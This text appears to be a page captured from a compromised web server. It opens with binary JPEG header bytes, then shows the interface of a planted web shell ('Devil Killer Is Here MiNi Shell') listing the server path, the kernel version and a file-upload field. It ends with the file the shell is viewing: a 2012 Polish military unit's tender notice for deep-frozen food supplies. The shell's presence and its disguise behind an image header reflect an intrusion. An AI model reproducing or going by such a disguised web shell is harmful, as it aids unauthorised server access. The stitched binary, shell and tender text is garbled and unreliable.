JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120214/36745-N-2012.html

<p class="kh_header"><b>Warszawa: DOSTAWA PRODUKTÓW GŁĘBOKO MROŻONYCH</b><br>
<b>Numer ogłoszenia: 36745 - 2012; data zamieszczenia: 14.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4226 , Ul. Marsa 110, 04-470 Warszawa, woj. mazowieckie, tel. 22 6815 030, faks 22 6815 093.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa - Podsektor Rządowy/Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA PRODUKTÓW GŁĘBOKO MROŻONYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów głęboko mrożonych w ilościach: 
Zadanie nr 1
1	Flaki zamrożone	kg	33
2	Pierogi z mięsem zamrożone	kg	362
3	Naleśniki z serem zamrożone	kg	166
4	Krokiety z mięsem zamrożone	kg	148
5	Pyzy ziemniaczane z mięsem zamrożone	kg	365
6	Gołąbki zamrożone	kg	304
7	Kapusta brukselska zamrożona	kg	233
8	Fasolka szparagowa zamrożona	kg	271
9	Różyczki kalafiora zamrożone	kg	275
10	Mieszanka warzywa II składnikowa zamrożona	kg	333
11	Mieszanka warzywna III składnikowa zamrożona	kg	304
12	Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	25

Zadanie nr 2
1	Flaki zamrożone	kg	67
2	Pierogi z mięsem zamrożone	kg	99
3	Pierogi z kapustą i grzybami zamrożone	kg	47
4	Pierogi z serem zamrożone	kg	47
5	Knedle owocowe zamrożone	kg	47
6	Uszka z kapustą i grzybami zamrożone	kg	20
7	Naleśniki z serem zamrożone	kg	67
8	Naleśniki z owocami zamrożone	kg	67
9	Krokiety z kapustą i grzybami zamrożone	kg	67
10	Krokiety z mięsem zamrożone	kg	67
11	Pyzy ziemniaczane z mięsem zamrożone	kg	97
12	Gołąbki zamrożone	kg	33
13	Truskawka zamrożona	kg	17
14	Czarna porzeczka zamrożone	kg	33
15	Śliwka zamrożona	kg	33
16	Kapusta brukselska zamrożona	kg	70
17	Fasolka szparagowa zamrożona	kg	70
18	Różyczki kalafiora zamrożone	kg	150
19	Mieszanka warzywa II składnikowa zamrożona	kg	37
20	Mieszanka warzywna III składnikowa zamrożona	kg	50
21	Szpinak zamrożony	kg	73
22	Paszteciki drożdżowe z mięsem zamrożone	kg	23
23	Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	23
24	Paszteciki drożdżowe z pieczarkami i serem zamrożone	kg	23
25	Pyzy ziemniaczane zamrożone	kg	67
26	Kluski śląskie zamrożone	kg	47
27	Kopytka zamrożone	kg	100
28	Frytki zamrożone	kg	33
29	Bigos zamrożony	kg	33
30	Kotlet mielony wieprzowo-wołowy zamrożony	kg	33
31	Sznycel wieprzowy zamrożony	kg	33
32	Sznycel drobiowy zamrożony	kg	33
33	Kotlet schabowy panierowany zamrożony	kg	33
34	Kotlet de vollaile zamrożony	kg	33
35	Kotlet z piersi  kurczaka panierowany zamrożony	kg	33
36	Roladka z kurczaka parzona	kg	33
37	Udziec z kurczaka panierowany zamrożony	kg	33
38	Fasolka po bretońsku zamrożona	kg	33
39	Gulasz wieprzowy zamrożony	kg	33
40	Gulasz wołowy zamrożony	kg	33

Zadanie nr 3
1	Flaki zamrożone	kg	250
2	Pierogi z mięsem zamrożone	kg	417
3	Pierogi z kapustą i grzybami zamrożone	kg	30
4	Pierogi z serem zamrożone	kg	167
5	Uszka z kapustą i grzybami zamrożone	kg	20
6	Naleśniki z serem zamrożone	kg	500
7	Krokiety z kapustą i grzybami zamrożone	kg	50
8	Krokiety z mięsem zamrożone	kg	250
9	Pyzy ziemniaczane z mięsem zamrożone	kg	500
10	Gołąbki zamrożone	kg	167
11	Truskawka zamrożona	kg	467
12	Czarna porzeczka zamrożone	kg	550
13	Śliwka zamrożona	kg	383
14	Kapusta brukselska zamrożona	kg	333
15	Fasolka szparagowa zamrożona	kg	500
16	Różyczki kalafiora zamrożone	kg	750
17	Mieszanka warzywa II składnikowa zamrożona	kg	834
18	Mieszanka warzywna III składnikowa zamrożona	kg	667
19	Szpinak zamrożony	kg	83
20	Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	10
21	Paszteciki drożdżowe z pieczarkami i serem zamrożone	kg	83
22	Kluski śląskie zamrożone	kg	83
23	Kopytka zamrożone	kg	167
24	Frytki zamrożone	kg	333

Zadanie nr 4
1	Flaki zamrożone	kg	577
2	Pierogi z mięsem zamrożone	kg	416
3	Pierogi z kapustą i grzybami zamrożone	kg	267
4	Pierogi z serem zamrożone	kg	216
5	Knedle owocowe zamrożone	kg	243
6	Uszka z kapustą i grzybami zamrożone	kg	30
7	Naleśniki z serem zamrożone	kg	453
8	Naleśniki z owocami zamrożone	kg	283
9	Krokiety z kapustą i grzybami zamrożone	kg	416
10	Krokiety z mięsem zamrożone	kg	449
11	Pyzy ziemniaczane z mięsem zamrożone	kg	333
12	Gołąbki zamrożone	kg	430
13	Truskawka zamrożona	kg	446
14	Czarna porzeczka zamrożone	kg	289
15	Śliwka zamrożona	kg	73
16	Kapusta brukselska zamrożona	kg	243
17	Fasolka szparagowa zamrożona	kg	383
18	Różyczki kalafiora zamrożone	kg	490
19	Mieszanka warzywa II składnikowa zamrożona	kg	397
20	Mieszanka warzywna III składnikowa zamrożona	kg	397
21	Szpinak zamrożony	kg	77
22	Paszteciki drożdżowe z mięsem zamrożone	kg	113
23	Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	113
24	Paszteciki drożdżowe z pieczarkami i serem zamrożone	kg	113
25	Pyzy ziemniaczane zamrożone	kg	127
26	Kluski śląskie zamrożone	kg	466
27	Kopytka zamrożone	kg	406
28	Frytki zamrożone	kg	457
29	Bigos zamrożony	kg	33
30	Kotlet mielony wieprzowo-wołowy zamrożony	kg	17
31	Sznycel wieprzowy zamrożony	kg	114
32	Sznycel drobiowy zamrożony	kg	114
33	Kotlet schabowy panierowany zamrożony	kg	114
34	Kotlet de vollaile zamrożony	kg	114
35	Kotlet z piersi  kurczaka panierowany zamrożony	kg	100
36	Roladka z kurczaka parzona	kg	17
37	Udziec z kurczaka panierowany zamrożony	kg	97
38	Fasolka po bretońsku zamrożona	kg	33.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5, 15.33.24.00-8, 15.33.11.70-9, 15.31.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga zabezpieczenia oferty wadium.
2.	Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium w wysokości 4 000,00 PLN (słownie: cztery tysiące złotych), w tym na:
zadanie 1 -    400,00 PLN (słownie: czterysta złotych);
zadanie 2 -    400,00 PLN (słownie: czterysta złotych.);
zadanie 3 - 1 200,00 PLN (słownie: jeden tysiąc dwieście złotych);
zadanie 4 - 2 000,00 PLN (słownie: dwa tysiące zł.);
Wykonawca składający ofertę na wybrane zadania dokonuje wpłaty wadium w wysokości wyszczególnionej dla poszczególnych zadań (części). 
3.	Wadium może być wniesione w:
3.1.	 pieniądzu,
3.2.	 poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.3.	 gwarancjach bankowych,
3.4.	 gwarancjach ubezpieczeniowych,
3.5.	 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).
4.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku NBP O O Warszawa, nr rachunku 18 1010 1010 0044 0213 9120 0000, z dopiskiem na przelewie: Wadium w postępowaniu na: . O terminie wniesienia wadium, decydować będzie data wpływu środków na rachunek bankowy Zamawiającego.
5.	Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
5.1.	pieniężnej dokument potwierdzający wniesienie wadium został załączony do oferty,
5.2.	innej niż pieniądz, oryginał dokumentu został złożony w Kasie Zamawiającego, a jego kopia   załączona do oferty.
6.	Z treści gwarancji, poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a oraz ust. 5 ustawy PZP.
7.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
8.	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli: 1.1.1. Wykonawca został dopuszczony do produkcji lub obrotu artykułami spożywczymi i posiada decyzję o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów zgodnie z art. 62 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia Dz. U. z 2010 r. Nr 136, poz.914 z późn. zm. - wydaną przez właściwy organ urzędowej kontroli żywności - jeżeli ustawy nakładają obowiązek posiadania takich uprawnień lub zaświadczenie o wpisie do rejestru zakładów wydane przez Państwową Inspekcję Sanitarną na podstawie art. 62 ust. 1 pkt. 4 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia Dz. U. Nr 171 poz. 1225 ze zm.. 1.1.2. Wykonawca posiada zgłoszoną działalność gospodarczą w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi, zgodnie z art. 12 ust. 1 ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (Dz. U. z 2005 r. nr 187, poz. 1577 z późn. zm.) - jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, minimum 1 (jedną) dostawę, odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot zamówienia z podaniem wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie, np. referencje. Wartość każdej (pojedynczej) dostawy winna być nie mniejsza niż:
na zadanie 1 -   12 000,00 zł;
na zadanie 2 -   12 000,00 zł;
na zadanie 3 -   36 000,00 zł;
na zadanie 4 -   72 000,00 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż łącznie 132 000,00 PLN,w tym:
na zadanie 1 -   12 000,00 zł;
na zadanie 2 -   12 000,00 zł;
na zadanie 3 -   36 000,00 zł;
na zadanie 4 -   72 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">2.5. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, do oferty należy załączyć: 2.5.1. protokół z ostatniej kontroli sanitarnej właściwego organu urzędowej kontroli w zakresie bezpieczeństwa żywności o prawidłowości stosowania zasad systemu HACCP, zgodnie z art. 73 ust. 1 pkt. 1 litera c ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia - ( DZ. U. z 2010 r. Nr 136, poz. 914 z późn. zm.) - wystawiony nie wcześniej 12 miesięcy przed upływem terminu składania ofert. 2.5.2. oświadczenie, że oferowane produkty odpowiadają specyfikacjom technicznym (wymaganiom) określonym przez Zamawiającego.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>2.1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania działalności, Zamawiający żąda następujących dokumentów: 2.1.1. aktualnej decyzji administracyjnej wydanej przez właściwy organ Państwowej Inspekcji Sanitarnej lub Weterynaryjnej o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów zgodnie z art. 62 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia - (Dz. U. z 2010 r. Nr 136, poz.914 z późn. zm.) oraz ustawy z dnia 16 grudnia 2005 o produktach pochodzenia zwierzęcego - Dz. U. z 2006r. Nr 17 poz. 127 z poź. zm.) - jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 2.1.2. potwierdzenie zgłoszenia działalności gospodarczej w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi, wydane przez wojewódzkiego inspektora jakości handlowej artykułów rolno-spożywczych, właściwego ze względu na miejsce zamieszkania lub siedzibę Wykonawcy - art. 12 ust. 1 ustawy z dnia 21 grudnia 2000r., o jakości handlowej artykułów rolno-spożywczych jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Zamawiający żąda załączenia do oferty Pełnomocnictwa do podpisania oferty i załączników, o ile prawo do reprezentowania Wykonawcy nie wynika z innych dokumentów złożonych wraz z ofertą. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, do oferty należy dołączyć pełnomocnictwo podpisane przez uprawnionych przedstawicieli pozostałych Wykonawców, upoważniające jednego z Wykonawców do reprezentowania 